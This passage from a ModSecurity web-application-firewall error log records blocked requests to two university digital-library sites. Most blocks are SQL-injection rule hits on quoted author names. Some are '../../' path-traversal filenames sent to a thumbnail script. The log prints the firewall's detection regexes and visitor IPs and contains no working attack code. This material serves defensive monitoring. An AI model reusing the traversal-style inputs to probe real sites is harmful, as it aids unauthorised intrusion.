"ZO2IicCo-f0AAA-G8zgAAAAL"]
[Tue Aug 29 13:02:50.484988 2023] [:error] [pid 4101] [client 103.147.220.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/JTS.EMER.2016.009_(Cover).gif.gif"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZO2KCsCo-f0AABAF90sAAAAI"]
[Tue Aug 29 13:21:30.650859 2023] [:error] [pid 4479] [client 103.147.220.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/JTS.EMER.2016.009_(Cover).gif.gif"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZO2OasCo-f0AABF-1y4AAAAB"]
[Tue Aug 29 13:24:59.211426 2023] [:error] [pid 4585] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Low-volume products\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2PO8Co-f0AABHp5owAAAAM"]
[Tue Aug 29 14:16:06.505312 2023] [:error] [pid 5506] [client 8.219.40.180] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/JTS.EMER.2016.006_(Cover).gif.gif"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZO2bNsCo-f0AABWCuJ4AAAAA"]
[Tue Aug 29 14:19:02.206854 2023] [:error] [pid 5712] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22penalty\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2b5sCo-f0AABZQxxsAAAAV"]
[Tue Aug 29 14:49:51.867237 2023] [:error] [pid 6738] [client 85.208.96.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Juwana, Jimmy S.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2jH8Co-f0AABpSJzMAAAAK"]
[Tue Aug 29 15:01:48.493374 2023] [:error] [pid 6877] [client 74.234.37.185] ModSecurity: Warning. Operator GE matched 2 at IP:dos_burst_counter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_11_dos_protection.conf"] [line "44"] [id "981049"] [msg "Potential Denial of Service (DoS) Attack from 74.234.37.185 - # of Request Bursts: 2"] [hostname "digilibft.unla.ac.id"] [uri "/srx.php"] [unique_id "ZO2l68Co-f0AABrdxpAAAAAV"]
[Tue Aug 29 15:19:54.112844 2023] [:error] [pid 7270] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Drivers\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2qKsCo-f0AABxm2qgAAAAA"]
[Tue Aug 29 15:20:04.439533 2023] [:error] [pid 7276] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Anup Prabhakarrao Chaple\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2qNMCo-f0AABxs50oAAAAG"]
[Tue Aug 29 15:20:25.708592 2023] [:error] [pid 7225] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Patrizia Garengo\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2qScCo-f0AABw5A6YAAAAq"]
[Tue Aug 29 15:36:50.587488 2023] [:error] [pid 7489] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Okiishi, Theodore H.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2uIsCo-f0AAB1BjSQAAAAR"]
[Mon Aug 28 06:46:46.246607 2023] [:error] [pid 37420] [client 47.128.23.219] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SEKARAN, UMA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvgZsCo-f0AAJIsPYUAAAAV"]
[Mon Aug 28 06:58:24.644074 2023] [:error] [pid 37535] [client 47.128.26.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PENGANTAR ILMU EKONOMI MIKRO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvjIMCo-f0AAJKfTrIAAAAC"]
[Mon Aug 28 07:10:20.312306 2023] [:error] [pid 37401] [client 47.128.18.162] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22FAUZIAH\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvl7MCo-f0AAJIZSm8AAAAF"]
[Mon Aug 28 07:11:34.695306 2023] [:error] [pid 37574] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ALI, ZAINUDDIN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmNsCo-f0AAJLG-fgAAAAI"]
[Mon Aug 28 07:11:36.420038 2023] [:error] [pid 37574] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22BAHARUDDIN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmOMCo-f0AAJLG-fkAAAAI"]
[Mon Aug 28 07:11:38.280578 2023] [:error] [pid 37451] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22BINTORO TJOKROAMIDJOJO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmOsCo-f0AAJJLqX0AAAAA"]
[Mon Aug 28 07:11:40.057679 2023] [:error] [pid 37619] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22DR. FUADY, MUNIR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmPMCo-f0AAJLzWM4AAAAC"]
[Mon Aug 28 07:11:41.860854 2023] [:error] [pid 37616] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ed. LINDSEY, TIM\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmPcCo-f0AAJLwXycAAAAB"]
[Mon Aug 28 07:11:43.627759 2023] [:error] [pid 37451] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ens\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmP8Co-f0AAJJLqX8AAAAA"]
[Mon Aug 28 07:11:45.645125 2023] [:error] [pid 37721] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22IBRAHIM, JOHANNES\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmQcCo-f0AAJNZd6gAAAAJ"]
[Mon Aug 28 07:11:47.526694 2023] [:error] [pid 37539] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22IKHWANSYAH, ISIS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmQ8Co-f0AAJKjZTsAAAAG"]
[Mon Aug 28 07:11:49.414187 2023] [:error] [pid 37722] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22IND\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmRcCo-f0AAJNard4AAAAK"]
[Mon Aug 28 07:11:51.216881 2023] [:error] [pid 37616] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ISHAQ\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmR8Co-f0AAJLwXykAAAAB"]
[Mon Aug 28 07:11:53.116708 2023] [:error] [pid 37619] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MARZUKI, PETER MAHMUD\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmScCo-f0AAJLzWNIAAAAC"]
[Mon Aug 28 07:11:54.996814 2023] [:error] [pid 37416] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MULYADI, LILIK.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmSsCo-f0AAJIobDIAAAAR"]
[Mon Aug 28 07:11:56.884142 2023] [:error] [pid 37616] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SOEKANTO, SOERJONO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmTMCo-f0AAJLwXyoAAAAB"]
